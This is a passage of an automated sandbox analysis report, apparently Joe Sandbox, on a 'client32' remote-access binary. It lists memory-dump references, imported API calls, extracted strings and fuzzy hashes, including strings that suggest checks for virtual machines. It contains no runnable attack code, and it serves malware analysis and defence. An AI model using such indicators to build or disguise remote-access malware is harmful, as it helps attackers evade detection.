                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Select$CreateObjectPalette$CompatibleDeleteReleaseSection
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 602542589-0
                                                                                                                        • Opcode ID: f9837fefdf0f1fbb5651e24b3a8078af4e21e61c33b31645051b8c91f3a50013
                                                                                                                        • Instruction ID: f8b28bdea48ec2611b1f91f2bbafde9b68da4a4719e2569757cfb30afdba7c1c
                                                                                                                        • Opcode Fuzzy Hash: f9837fefdf0f1fbb5651e24b3a8078af4e21e61c33b31645051b8c91f3a50013
                                                                                                                        • Instruction Fuzzy Hash: 7851DAF5E012299FDB60DF28CD8479DBBB9EF88604F5091EAE609E3240D7705A81CF59
                                                                                                                        APIs
                                                                                                                        • GetProcAddress.KERNEL32(00000000,111918F0), ref: 1100D3C4
                                                                                                                        • GetProcAddress.KERNEL32(00000000,111918E0), ref: 1100D3D8
                                                                                                                        • GetProcAddress.KERNEL32(00000000,111918D0), ref: 1100D3ED
                                                                                                                        • GetProcAddress.KERNEL32(00000000,111918C0), ref: 1100D401
                                                                                                                        • GetProcAddress.KERNEL32(00000000,111918B4), ref: 1100D415
                                                                                                                        • GetProcAddress.KERNEL32(00000000,11191894), ref: 1100D42A
                                                                                                                        • GetProcAddress.KERNEL32(00000000,11191874), ref: 1100D43E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,11191864), ref: 1100D452
                                                                                                                        • GetProcAddress.KERNEL32(00000000,11191854), ref: 1100D467
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 190572456-0
                                                                                                                        • Opcode ID: 2be2e3181ad7e37179dd4622537a04b9d19e6dc6cc5aab668c0a44b38469d94a
                                                                                                                        • Instruction ID: 9f027eddd4dddc581f186f25ec93b792fa700742cd5a4619bf017c7ec0e1ed24
                                                                                                                        • Opcode Fuzzy Hash: 2be2e3181ad7e37179dd4622537a04b9d19e6dc6cc5aab668c0a44b38469d94a
                                                                                                                        • Instruction Fuzzy Hash: 4B31BBB59122349FE706DBE4C8D5A76B7E9E34C758F00857AE93083248D7F4A881CFA0
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?,7E4636A2,?,?,?), ref: 1106D0E2
                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,1106AF10,?,?,?,?,?), ref: 1106D1C2
                                                                                                                        Strings
                                                                                                                        • erased=%d, idata->dead=%d, xrefs: 1106D293
                                                                                                                        • ..\ctl32\Connect.cpp, xrefs: 1106D2AA
                                                                                                                        • Deregister NC_CHATEX for conn=%s, q=%p, xrefs: 1106D0C5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalEnterEventSection
                                                                                                                        • String ID: ..\ctl32\Connect.cpp$Deregister NC_CHATEX for conn=%s, q=%p$erased=%d, idata->dead=%d
                                                                                                                        • API String ID: 2291802058-2272698802
                                                                                                                        • Opcode ID: 4c4459f730ece1a7db6b629c2ae3fc9ade6f363c06eb62c3d438a519b44550e4
                                                                                                                        • Instruction ID: b22ba82a88fbe9628385044aa67eb00d20c4b44079c4ac5070634ae5489f2a97
                                                                                                                        • Opcode Fuzzy Hash: 4c4459f730ece1a7db6b629c2ae3fc9ade6f363c06eb62c3d438a519b44550e4
                                                                                                                        • Instruction Fuzzy Hash: EE71BC70E00286EFEB15CF64C884F9DBBF9AB04314F0481D9E44A9B291D770E9C5CB90
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 68596DFD
                                                                                                                        • #16.WSOCK32(6859A730,?,00000001,00000000,?,6859A730,?,00002000,,?,6859ACF4,00000000,00000000,?,?,00000010), ref: 68596E4C
                                                                                                                        • WSASetLastError.WSOCK32(00002747,?,6859A730,?,00002000,,?,6859ACF4,00000000,00000000,?,?,00000010,00000002,00000001,00000000), ref: 68596F25
                                                                                                                        • WSASetLastError.WSOCK32(00002745,6859A730,?,00000001,00000000,?,6859A730,?,00002000,,?,6859ACF4,00000000,00000000,?,?), ref: 68596F36
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_memset
                                                                                                                        • String ID: $Content-Length:$HTTP/
                                                                                                                        • API String ID: 536390146-1146010681
                                                                                                                        • Opcode ID: 7768e075afdc92c5ddb19ff8ccacc7e64668f43ca05df8cb2a7723f4ef129ef0
                                                                                                                        • Instruction ID: 2550b532206b0b9f71c287a4989f745658afb19e23b79d67157d294a612faf31
                                                                                                                        • Opcode Fuzzy Hash: 7768e075afdc92c5ddb19ff8ccacc7e64668f43ca05df8cb2a7723f4ef129ef0
                                                                                                                        • Instruction Fuzzy Hash: 88315E75644381ABEF01996CDC69B7B32E89FA0384FC40028FE3887185FB31D90C81E5
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 685B0D40: LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,685B0F2B,89DA8021,00000000,?,?,685CF278,000000FF,?,6859AE0A,?,00000000,?,00000080), ref: 685B0D48
                                                                                                                          • Part of subcall function 685B0D40: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 685B0D5B
                                                                                                                          • Part of subcall function 685B0D40: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-685DCB4C,?,?,685CF278,000000FF,?,6859AE0A,?,00000000,?,00000080), ref: 685B0D76
                                                                                                                          • Part of subcall function 685B0D40: _free.LIBCMT ref: 685B0D84
                                                                                                                          • Part of subcall function 685B0D40: _malloc.LIBCMT ref: 685B0D8C
                                                                                                                          • Part of subcall function 685B0D40: GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,685CF278,000000FF,?,6859AE0A,?,00000000,?), ref: 685B0D9F
                                                                                                                          • Part of subcall function 685B0D40: _free.LIBCMT ref: 685B0DAF
                                                                                                                          • Part of subcall function 685B0970: LoadLibraryA.KERNEL32(ws2_32.dll), ref: 685B09A6
                                                                                                                          • Part of subcall function 685B0970: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 685B09C3
                                                                                                                          • Part of subcall function 685B0970: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 685B09CD
                                                                                                                          • Part of subcall function 685B0970: GetProcAddress.KERNEL32(00000000,socket), ref: 685B09DB
                                                                                                                          • Part of subcall function 685B0970: GetProcAddress.KERNEL32(00000000,closesocket), ref: 685B09E9
                                                                                                                          • Part of subcall function 685B0970: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 685B09F7
                                                                                                                          • Part of subcall function 685B0970: FreeLibrary.KERNEL32(00000000), ref: 685B0A6C
                                                                                                                        • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 685B0FF6
                                                                                                                        • GetProcAddress.KERNEL32(00000000,ntohl), ref: 685B100C
                                                                                                                        • _malloc.LIBCMT ref: 685B1020
                                                                                                                        • _free.LIBCMT ref: 685B10E5
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 685B10FA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$Library$Load_free$AdaptersAddressesFree_malloc
                                                                                                                        • String ID: ntohl$ws2_32.dll
                                                                                                                        • API String ID: 4086026317-4165132517
                                                                                                                        • Opcode ID: 652675994e9ca2638da659f913960cd3eafd4819e57afe1a84ecf36e93bc7fff
                                                                                                                        • Instruction ID: 1264cb2477f1a9e93aee7249f305f57be9d6bc3753e4a15d21fb88690baffdd2
                                                                                                                        • Opcode Fuzzy Hash: 652675994e9ca2638da659f913960cd3eafd4819e57afe1a84ecf36e93bc7fff
                                                                                                                        • Instruction Fuzzy Hash: 54417FB59402598BDB64DF24CC646EA73F9BF64304F9084A9D899A3240EF35EE84CFD0
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100F2FD
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100F320
                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 1100F3A4
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 1100F3B2
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100F3C5
                                                                                                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F3DF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 2427920155-3145022300
                                                                                                                        • Opcode ID: 801cc3ce022a6b056ddab743a2237e93a357ff3796620844a7456d523b295f49
                                                                                                                        • Instruction ID: d39dcf25abbe8801d5c0a0784b2024497f923947b746a9a7221ebbb3b7ea5b8b
                                                                                                                        • Opcode Fuzzy Hash: 801cc3ce022a6b056ddab743a2237e93a357ff3796620844a7456d523b295f49
                                                                                                                        • Instruction Fuzzy Hash: 6F31BF75D042659FDB55DF98C880BAEF7B4EB053B8F40826DD822A7290DB31B904DB92
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 6859102B
                                                                                                                          • Part of subcall function 685B1B69: __FF_MSGBANNER.LIBCMT ref: 685B1B82
                                                                                                                          • Part of subcall function 685B1B69: __NMSG_WRITE.LIBCMT ref: 685B1B89
                                                                                                                          • Part of subcall function 685B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,685BD3C1,685B6E81,00000001,685B6E81,?,685BF447,00000018,685D7738,0000000C,685BF4D7), ref: 685B1BAE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_malloc
                                                                                                                        • String ID: @$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=$VUUU$base64.cpp$cchOut >= cchWorst$pszOut
                                                                                                                        • API String ID: 501242067-340907830
                                                                                                                        • Opcode ID: 594e49703f45853e724f16429aeaa93b4df3846a8bff557c468b94efaf5904e2
                                                                                                                        • Instruction ID: ea3e22f139199d44e4e5be34ef2fe9a041bda1e28a5b866d3d1f00133f491008
                                                                                                                        • Opcode Fuzzy Hash: 594e49703f45853e724f16429aeaa93b4df3846a8bff557c468b94efaf5904e2
                                                                                                                        • Instruction Fuzzy Hash: 313158769852E89BCB008E6D880169DBBB9ABD2215F4941A7EC54DB301E13AEA06C794
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID: IsA()$NSMString.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$iAt+nUnits<=Length()$iAt>=0 && iAt<Length()$nUnits>=0
                                                                                                                        • API String ID: 4104443479-3492528137
                                                                                                                        • Opcode ID: 2edc3ef06d0cafb173af99235b805d3818adba06a137fece085a7ea69c79cc83
                                                                                                                        • Instruction ID: 44d4b73d4fe0fefe29801e707e03a7f7921de2a2ad03d39a92d9e36cd84a5fd6
                                                                                                                        • Opcode Fuzzy Hash: 2edc3ef06d0cafb173af99235b805d3818adba06a137fece085a7ea69c79cc83
                                                                                                                        • Instruction Fuzzy Hash: FB21F73964020AAFDB04EE5CECE1D3E3394DFD9248BD04528FE5C67249DB22BD0546EA
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID: IsA()$NSMString.cpp$iAt<=m_nLength$iAt>=0$pszStr!=NULL
                                                                                                                        • API String ID: 4104443479-3876480746
                                                                                                                        • Opcode ID: 36ec98648d29fe0afcc35754f030bdfbbb521fc9e4305061c17343d3ad7bb629
                                                                                                                        • Instruction ID: 79358fa8bd984897630ceb1b94794f39bd20fa9264bb2a6753bf8f4677ca8712
                                                                                                                        • Opcode Fuzzy Hash: 36ec98648d29fe0afcc35754f030bdfbbb521fc9e4305061c17343d3ad7bb629
                                                                                                                        • Instruction Fuzzy Hash: 7B21297A64020ABFDB04AA58DCD4DBF7394EF95358BC44125FE5C6B205EB20BD0441E6
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _sprintf
                                                                                                                        • String ID: %02X%02X%02X%02X%02X%02X$0000000000$02004C4F4F50$VIRTNET$VMware$Virtual
                                                                                                                        • API String ID: 1467051239-555777999
                                                                                                                        • Opcode ID: 6967027be84f99fbf530c3433a8cff4120bab63a82826d81e5c3605691ecba34
                                                                                                                        • Instruction ID: 7989ec8a52d39897fd5c61db717de59bcf340a2263e4f7650474c271b9e20abd
                                                                                                                        • Opcode Fuzzy Hash: 6967027be84f99fbf530c3433a8cff4120bab63a82826d81e5c3605691ecba34
                                                                                                                        • Instruction Fuzzy Hash: 0321E5759003486EDB10DA748C60EFEB7F88F99205F8045D9ED9E92140EA35FA488BA0
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(Kernel32.dll,7E4636A2,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110310E2
                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031120
                                                                                                                        • GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 1103112E
                                                                                                                        • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031146
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031154
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressCurrentErrorFreeLastLoadProcProcess
